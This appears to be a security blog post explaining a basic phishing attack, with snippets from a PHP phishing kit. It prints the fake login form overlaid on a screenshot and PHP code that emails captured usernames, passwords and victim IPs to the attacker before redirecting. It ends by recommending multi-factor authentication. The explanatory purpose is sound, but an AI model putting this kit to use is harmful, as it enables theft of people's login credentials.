Basic Phishing Attack

A basic phishing attack is nothing more than a copycat of a login form that impersonates a target website. Under the hood it might looks like a screenshot of the target website and a form with username and password fields.

Here is a snippet based on a phishing kit written in PHP that was obtained when trying to take down an active attack.

<html xmlns="" xml:lang="en-US" lang="en-US">
  <link rel="shortcut icon" href="images/favicoon.ico"/>
  <link rel="stylesheet" href="style.css"/>
    <img src="images/target-screenshot.png">

    <form id="signon" action="next.php" method="post">
        <input type="text" required name="user">

        <input type="password" required name="pass">
        <input name="submit" type="submit" id="signon" value="Sign On" >

The trick is to fiddle with CSS to overlay the form on top of the screenshot properly. Once a victim is presented with this page the hope is that they are going to reach straight to the input fields completely ignoring the "unresponsiveness" of the page. Here is how it might look like in real life.

Now when the victim clicks on Sign On an attacker needs to collect the credentials. Typically it's done through an email. Let's take a look at the code from a phishing kit.

$ip = getenv("REMOTE_ADDR");

$message .= "-----------------------------------------------\n";
$message .= "Username: ".$_POST["user"]."\n";
$message .= "Password: ".$_POST["pass"]."\n";
$message .= "-----------------------------------------------\n";
$message .= "IP : ".$ip."\n";
$message .= "-------------------Demo-------------------\n";

$recipient = "";

$headers = "From:\n";
$headers .= "MIME-Version: 1.0\n";

mail($recipient, "New Victim", $message, $headers);

header("Location: finish.php");

Here you can see the attacker grabs the credentials and the IP of the victim and creates an email with that information. Last line of the snippet redirects the victim to a page that might show an error so the user can't immediately recognize they were hacked.

All in all this approach is pretty simple and only requires an attacker to have a web hosting to upload a few malicious files such as a couple of images and a couple of scripts. Technically if an attacker uses inline CSS and base64 encoded image it could be compiled into a single file.

To protect from these attacks we would recommend using any sort of Multi Factor Authentication. Granted some types of MFA are not sufficient to protect from more sophisticated attacks, but that's a story for another post.